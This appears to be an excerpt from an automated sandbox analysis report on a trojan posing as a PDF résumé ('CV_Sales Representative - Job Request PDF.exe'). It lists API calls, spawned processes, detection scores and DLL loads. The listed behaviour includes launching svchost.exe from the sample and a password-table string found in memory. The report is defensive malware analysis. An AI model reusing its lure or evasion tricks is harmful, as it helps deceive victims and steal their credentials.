            Source: 7zG.exe.1.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
            Source: AppVDllSurrogate32.exe.1.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
            Source: AppVDllSurrogate64.exe.1.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
            Source: AppVLP.exe.1.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
            Source: OneDriveSetup.exe.1.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
            Source: Integrator.exe.1.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
            Source: AppSharingHookController.exe.1.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
            Source: Common.ShowHelp.exe.1.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
            Source: Acrobat.exe.1.drBinary string: \\\\?\UNC\\Device\Mup\\Device\LanmanRedirector\\Device\WebDavRedirector\\Device\WinDfs\\Device\NetWareRedirector\\Device\nwrdr\4202392NtQueryObjectRtlNtStatusToDosErrorRtlCompareUnicodeString\Device\WinDFSCdmRedirectorVolume\Device\HarddiskVolumeDirectory<>:"\|?*Software\Policies\Adobe\Adobe Acrobat\DC\FeatureLockDownbEnableSameObjectCheckbSupportRDSUPDSYSTEM\CurrentControlSet\Control\Terminal Server\ClusterSettingsUvhdEnabledbFilePathPreprocessingUseFileHandleEnabledbFilePathPreprocessingShortcutEnabled"GetFinalPathNameByHandleWGetVolumeInformationByHandleWGetVolumeInformationWacrolock%s%u.%u.%u.tmp%s%s%ssnacnp64.dllsnacnp.dllADC4307573conprnauxnulcomlptshell:::\/:NtQueryInformationFilewin\src\win_utils.ccSameKernelObject check failed: {100184D2-BDC3-477a-B8D3-65548B67914C}_%uLocal\Global\NtQueryVolumeInformationFileSYSTEM\CurrentControlSet\Control\Terminal ServerGlassSessionIduserenv.dllDeriveAppContainerSidFromAppContainerNameGetAppContainerFolderPathNtOpenDirectoryObjectGetAppContainerNamedObjectPath\Sessions\%d\%sNtQueryInformationProcess[ZoneTransfer]
            Source: Acrobat.exe.1.drBinary string: \??\UNC\\\.\\Device\SftVol\ntdll.dllA:\Device\\\?\/?/UNC/\?\UNC\
            Source: Acrobat.exe.1.drBinary string: win\src\filesystem_policy.ccFailed to process path (recursion detected):Failed to process path: error code:Unexpected error in path processing of:Unexpected error in source path processing of:::$DATA:$I30:$INDEX_ALLOCATION::$INDEX_ALLOCATION\\.\pipe\\\.\mailslot\Invalid path: \/?/?\UNC\Unexpected handle for path: Unexpected handleInvalid Object foundrequested path: actual path: Handle must be NULLCreateKeywin\src\registry_policy.ccUnexpected for: Real path: OpenKey\\?\pipe\NGLWFPipe__INS:(ML;;NW;;;LW)D:P(A;;GA;;;OW)(A;;GA;;;AC)\\?\pipe\\Device\NamedPipe\win\src\named_pipe_policy.ccSameObject check failed: InitializeProcThreadAttributeListUpdateProcThreadAttributewin\src\process_thread_policy.ccCreateProcessWAction: STATUS_ACCESS_DENIEDapp name: command line: NtCreateProcessExntdll.dllNtSuspendProcessNtResumeProcessNtQuerySymbolicLinkObjectNtOpenSymbolicLinkObjectNtClose%d\Sessions\BNOLINKSNtCreateEventNtOpenEventwin\src\signed_policy.ccHandle AccessCheck failed: ntdll.dllkernel32.dllNtAllocateVirtualMemoryNtDuplicateObjectNtFreeVirtualMemoryNtProtectVirtualMemoryNtQuerySectionNtQueryVirtualMemoryNtSignalAndWaitForSingleObjectNtWaitForSingleObjectRtlAllocateHeapRtlAnsiStringToUnicodeStringRtlCreateHeapRtlCreateUserThreadRtlDestroyHeapRtlFreeHeap_strnicmpstrlenwcslenmemcpy_wcsnicmpswprintf_sNtQueryInformationThreadNtCreateFileNtSetInformationFileNtQueryAttributesFileNtQueryFullAttributesFileNtOpenKeyNtCreateKeyNtDeleteValueKeyNtCreateMutantNtOpenMutantNtCreateSectionNtOpenSectionNtAddAtomNtFindAtomNtDeleteAtomNtQueryInformationAtomNtOpenThreadNtOpenProcessNtOpenProcessTokenNtOpenProcessTokenExNtAddAtomExg_ntNtSetInformationThreadNtOpenThreadTokenNtOpenThreadTokenExCreateThread
            Source: Acrobat.exe.1.drBinary string: REINSTALLMODE=omus DISABLE_FIU_CHECK=1 IGNOREAAM=1 REPAIRFROMAPP=1 INSTALLUWPAPP=1 IS_COEX_REPAIR=1 /qn/qb REINSTALLMODE=omus DISABLE_FIU_CHECK=1 IGNOREAAM=1 REPAIRFROMAPP=1 BROADCASTCEFRELOAD=1 \/0\*cef_*/qn CLEANUP_CEFFOLDER=1 DISABLE_FIU_CHECK=1 /i msiexec.exe/i ADD_ALL_DICT=1 REINSTALL=AdobeCommonLinguistics SKIP_WEBRCS_REINSTALL=1 SKIP_CEF_KILL=1 /qn.msiexec.exe/i ADDLOCAL=OptionalFeatures,DistillerCJKNative,DistillerCJKSupport,PaperCaptureOptional,PreFlightPlugin DISABLE_FIU_CHECK=1 TRANSITION_INSTALL_MODE=4 SKIP_WEBRCS_REINSTALL=1 SKIP_CEF_KILL=1 /qn\msiexec.exeSoftware\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.pdf\OpenWithList\MRUListAcrobat.exeMRUListAppDoNotTakePDFOwnershipAtLaunch\\\AppDoNotTakePDFOwnershipAtLaunchWin10DisableOwnershipPrompt.pdf.pdfxml.acrobatsecuritysettings.fdf.xfdf.xdp.pdx.api.secstore.sequ.rmf.bpdxAdobe Acrobat XI ProRtlGetVersionntdll.dll\??\UNC\\\?\UNC\\Device\Mup\\Device\LanmanRedirector\\Device\WebDavRedirector\\Device\WinDfs\\Device\NetWareRedirector\\Device\nwrdr\RtlGetVersionntdll.dllAdobe Systems, IncorporatedAdobe Inc.Adobe Systems Incorporated1.3.6.1.4.1.311.2.1.121.3.6.1.4.1.311.2.1.121.3.6.1.4.1.311.2.1.121.2.840.113549.1.9.61.3.6.1.4.1.311.3.3.1kernel32IsWow64ProcessSystem\CurrentControlSet\Control\CitrixProductVersionNumSoftware\Adobe\Acrobat\ExeSoftware\Microsoft\Windows\CurrentVersion\Policies\SystemEnableLUA/RegisterFileTypesOwnership /PRODUCT:Acrobat /VERSION:12.0 /FixPDF 3305580Click on 'Change' to select default PDF handler.pdf Properties#32770Click on 'Change' to select default PDF handler Properties#32770/\Click on 'Change' to select default PDF handler#32770ADelRCP.exepropertiesClick on 'Change' to select default PDF handler.pdfShowAppPickerForPDF.exeProgram ManagerPROGMANApplicationClick on 'Change' to select default PDF handler.pdf Properties#32770Click on 'Change' to select default PDF handler Properties#3277012Click on 'Change' to select default PDF handler#32770Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.pdf\UserChoice.0Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.pdf\UserChoice\InstallerSoftware\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.pdfSOFTWARE\Adobe\Acrobat Reader\12{A6EADE66-0000-0000-484E-7E8A45000000}{AC76BA86-0000-0000-7761-7E8A45000000}SOFTWARE\Adobe\Adobe Acrobat\{AC76BA86-0000-0000-7760-7E8A45000000}SOFTWARE\Adobe\Adobe Acrobat\{AC76BA86-0000-0000-BA7E-7E8A45000000}SOFTWARE\Adobe\Adobe Acrobat\VersionMajorVersionMinorVersionStringInstalledProductNameAdobe AcrobatreaderSOFTWARE\Wow6432Node\Adobe\Acrobat Reader\.0SOFTWARE\Wow6432Node\Adobe\Adobe Acrobat\SOFTWARE\Adobe\Acrobat Reader\SOFTWARE\Adobe\Adobe Acrobat\PATHVersionMajorVersionMinor7760-BA7E-7AD7-VersionStringInstalledProductNameAdobe AcrobatreaderDCSOFTWARE\Wow6432Node\Adobe\Acrobat Reader\\InstallerSOFTWARE\Wow6432Node\Adobe\Adobe Acrobat\SOFTWARE\Adobe\Acrobat Reader\SOFTWARE\Adobe\Adobe Acrobat\ENU_GUIDPATHInstallLocationAcrobat.Document.DC.pdf{AC76BA86-0000-00
            Source: Acrobat.exe.1.drBinary string: \\.\ko.%x.%x.%xSoftware\Classes\CLSID\{054AAE20-4BEA-4347-8A35-64A533254A9D}\LocalServer320123456789abcdef\Device\HarddiskVolume
            Source: Acrobat.exe.1.drBinary string: sbox_alternate_desktop_local_winstation_\??\\\?\\??\pipe\\??\mailslot\\/?/?\\Device\
            Source: classification engineClassification label: mal100.spre.troj.spyw.evad.winEXE@24/154@87/21
            Source: C:\Users\user\Desktop\CV_Sales Representative - Job Request PDF.exeCode function: 0_2_0046A06A GetLastError,FormatMessageW,0_2_0046A06A
            Source: C:\Users\user\Desktop\CV_Sales Representative - Job Request PDF.exeCode function: 0_2_004581CB AdjustTokenPrivileges,CloseHandle,0_2_004581CB
            Source: C:\Users\user\Desktop\CV_Sales Representative - Job Request PDF.exeCode function: 0_2_004587E1 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,0_2_004587E1
            Source: C:\Users\user\Desktop\CV_Sales Representative - Job Request PDF.exeCode function: 0_2_0046B333 SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode,0_2_0046B333
            Source: C:\Users\user\Desktop\CV_Sales Representative - Job Request PDF.exeCode function: 0_2_0047EE0D CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,0_2_0047EE0D
            Source: C:\Users\user\Desktop\CV_Sales Representative - Job Request PDF.exeCode function: 0_2_0046C397 CoInitialize,CoCreateInstance,CoUninitialize,0_2_0046C397
            Source: C:\Users\user\Desktop\CV_Sales Representative - Job Request PDF.exeCode function: 0_2_00404E89 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,0_2_00404E89
            Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeFile created: C:\Program Files (x86)\Mozilla Maintenance Service\logs\maintenanceservice.logJump to behavior
            Source: C:\Users\user\Desktop\CV_Sales Representative - Job Request PDF.exeFile created: C:\Users\user\AppData\Roaming\5b796eff430b0ac5.binJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeMutant created: \BaseNamedObjects\Global\Multiarch.m0yv-5b796eff430b0ac59ea72c54-b
            Source: C:\Users\user\Desktop\CV_Sales Representative - Job Request PDF.exeFile created: C:\Users\user\AppData\Local\Temp\aut7973.tmpJump to behavior
            Source: C:\Users\user\Desktop\CV_Sales Representative - Job Request PDF.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: mfpmp.exe, 00000019.00000002.2422170365.0000000003263000.00000004.00000020.00020000.00000000.sdmp, mfpmp.exe, 00000019.00000003.1565865507.0000000003263000.00000004.00000020.00020000.00000000.sdmp, mfpmp.exe, 00000019.00000003.1564372509.0000000003243000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
            Source: CV_Sales Representative - Job Request PDF.exeVirustotal: Detection: 80%
            Source: CV_Sales Representative - Job Request PDF.exeReversingLabs: Detection: 84%
            Source: unknownProcess created: C:\Users\user\Desktop\CV_Sales Representative - Job Request PDF.exe "C:\Users\user\Desktop\CV_Sales Representative - Job Request PDF.exe"
            Source: unknownProcess created: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe "C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe"
            Source: unknownProcess created: C:\Windows\System32\alg.exe C:\Windows\System32\alg.exe
            Source: C:\Users\user\Desktop\CV_Sales Representative - Job Request PDF.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\CV_Sales Representative - Job Request PDF.exe"
            Source: unknownProcess created: C:\Windows\System32\AppVClient.exe C:\Windows\system32\AppVClient.exe
            Source: unknownProcess created: C:\Windows\System32\FXSSVC.exe C:\Windows\system32\fxssvc.exe
            Source: unknownProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe "C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe"
            Source: unknownProcess created: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe "C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe"
            Source: unknownProcess created: C:\Windows\System32\msdtc.exe C:\Windows\System32\msdtc.exe
            Source: unknownProcess created: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exe C:\Windows\system32\PerceptionSimulation\PerceptionSimulationService.exe
            Source: unknownProcess created: C:\Windows\SysWOW64\perfhost.exe C:\Windows\SysWow64\perfhost.exe
            Source: unknownProcess created: C:\Windows\System32\Locator.exe C:\Windows\system32\locator.exe
            Source: unknownProcess created: C:\Windows\System32\SensorDataService.exe C:\Windows\System32\SensorDataService.exe
            Source: C:\Program Files (x86)\PHsZOyhkvmyMgxGRQbGJyoAgpElJFVCBrczssQOTLQGakVYlxbbKdoeVWDs\7EFPjTEjLAB4.exeProcess created: C:\Windows\SysWOW64\mfpmp.exe "C:\Windows\SysWOW64\mfpmp.exe"
            Source: unknownProcess created: C:\Windows\System32\snmptrap.exe C:\Windows\System32\snmptrap.exe
            Source: unknownProcess created: C:\Windows\System32\Spectrum.exe C:\Windows\system32\spectrum.exe
            Source: unknownProcess created: C:\Windows\System32\OpenSSH\ssh-agent.exe C:\Windows\System32\OpenSSH\ssh-agent.exe
            Source: unknownProcess created: C:\Windows\System32\TieringEngineService.exe C:\Windows\system32\TieringEngineService.exe
            Source: unknownProcess created: C:\Windows\System32\AgentService.exe C:\Windows\system32\AgentService.exe
            Source: unknownProcess created: C:\Windows\System32\vds.exe C:\Windows\System32\vds.exe
            Source: unknownProcess created: C:\Windows\System32\wbengine.exe "C:\Windows\system32\wbengine.exe"
            Source: C:\Users\user\Desktop\CV_Sales Representative - Job Request PDF.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\CV_Sales Representative - Job Request PDF.exe"Jump to behavior
            Source: C:\Program Files (x86)\PHsZOyhkvmyMgxGRQbGJyoAgpElJFVCBrczssQOTLQGakVYlxbbKdoeVWDs\7EFPjTEjLAB4.exeProcess created: C:\Windows\SysWOW64\mfpmp.exe "C:\Windows\SysWOW64\mfpmp.exe"
            Source: C:\Windows\SysWOW64\mfpmp.exeProcess created: unknown unknown
            Source: C:\Users\user\Desktop\CV_Sales Representative - Job Request PDF.exeSection loaded: wsock32.dllJump to behavior
            Source: C:\Users\user\Desktop\CV_Sales Representative - Job Request PDF.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\Desktop\CV_Sales Representative - Job Request PDF.exeSection loaded: winmm.dllJump to behavior
            Source: C:\Users\user\Desktop\CV_Sales Representative - Job Request PDF.exeSection loaded: mpr.dllJump to behavior
            Source: C:\Users\user\Desktop\CV_Sales Representative - Job Request PDF.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Users\user\Desktop\CV_Sales Representative - Job Request PDF.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\CV_Sales Representative - Job Request PDF.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Users\user\Desktop\CV_Sales Representative - Job Request PDF.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\Desktop\CV_Sales Representative - Job Request PDF.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Users\user\Desktop\CV_Sales Representative - Job Request PDF.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Users\user\Desktop\CV_Sales Representative - Job Request PDF.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Users\user\Desktop\CV_Sales Representative - Job Request PDF.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Users\user\Desktop\CV_Sales Representative - Job Request PDF.exeSection loaded: ntmarta.dllJump to behavior
            Source: C:\Users\user\Desktop\CV_Sales Representative - Job Request PDF.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\Desktop\CV_Sales Representative - Job Request PDF.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\Desktop\CV_Sales Representative - Job Request PDF.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\Desktop\CV_Sales Representative - Job Request PDF.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Users\user\Desktop\CV_Sales Representative - Job Request PDF.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Users\user\Desktop\CV_Sales Representative - Job Request PDF.exeSection loaded: winnsi.dllJump to behavior
            Source: C:\Users\user\Desktop\CV_Sales Representative - Job Request PDF.exeSection loaded: dhcpcsvc6.dllJump to behavior
            Source: C:\Users\user\Desktop\CV_Sales Representative - Job Request PDF.exeSection loaded: dhcpcsvc.dllJump to behavior
            Source: C:\Users\user\Desktop\CV_Sales Representative - Job Request PDF.exeSection loaded: webio.dllJump to behavior
            Source: C:\Users\user\Desktop\CV_Sales Representative - Job Request PDF.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSection loaded: mpr.dllJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSection loaded: ntmarta.dllJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSection loaded: winnsi.dllJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSection loaded: dhcpcsvc6.dllJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSection loaded: dhcpcsvc.dllJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSection loaded: webio.dllJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Windows\System32\alg.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Windows\System32\alg.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Windows\System32\alg.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\AppVClient.exeSection loaded: appvpolicy.dllJump to behavior
            Source: C:\Windows\System32\AppVClient.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\System32\AppVClient.exeSection loaded: wtsapi32.dllJump to behavior
            Source: C:\Windows\System32\AppVClient.exeSection loaded: netapi32.dllJump to behavior
            Source: C:\Windows\System32\AppVClient.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Windows\System32\AppVClient.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Windows\System32\AppVClient.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\System32\AppVClient.exeSection loaded: samcli.dllJump to behavior
            Source: C:\Windows\System32\AppVClient.exeSection loaded: logoncli.dllJump to behavior
            Source: C:\Windows\System32\AppVClient.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\System32\AppVClient.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Windows\System32\AppVClient.exeSection loaded: mpr.dllJump to behavior
            Source: C:\Windows\System32\AppVClient.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Windows\System32\AppVClient.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Windows\System32\AppVClient.exeSection loaded: ntmarta.dllJump to behavior
            Source: C:\Windows\System32\AppVClient.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\AppVClient.exeSection loaded: appmanagementconfiguration.dllJump to behavior
            Source: C:\Windows\System32\FXSSVC.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\System32\FXSSVC.exeSection loaded: tapi32.dllJump to behavior
            Source: C:\Windows\System32\FXSSVC.exeSection loaded: credui.dllJump to behavior
            Source: C:\Windows\System32\FXSSVC.exeSection loaded: fxstiff.dllJump to behavior
            Source: C:\Windows\System32\FXSSVC.exeSection loaded: slc.dllJump to behavior
            Source: C:\Windows\System32\FXSSVC.exeSection loaded: sppc.dllJump to behavior
            Source: C:\Windows\System32\FXSSVC.exeSection loaded: fxsresm.dllJump to behavior
            Source: C:\Windows\System32\FXSSVC.exeSection loaded: ualapi.dllJump to behavior
            Source: C:\Windows\System32\FXSSVC.exeSection loaded: slc.dllJump to behavior
            Source: C:\Windows\System32\FXSSVC.exeSection loaded: sppc.dllJump to behavior
            Source: C:\Windows\System32\FXSSVC.exeSection loaded: slc.dllJump to behavior
            Source: C:\Windows\System32\FXSSVC.exeSection loaded: sppc.dllJump to behavior
            Source: C:\Windows\System32\FXSSVC.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\System32\FXSSVC.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\System32\FXSSVC.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\System32\FXSSVC.exeSection loaded: slc.dllJump to behavior
            Source: C:\Windows\System32\FXSSVC.exeSection loaded: sppc.dllJump to behavior
            Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeSection loaded: dbghelp.dllJump to behavior
            Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeSection loaded: mpr.dllJump to behavior
            Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeSection loaded: secur32.dllJump to behavior
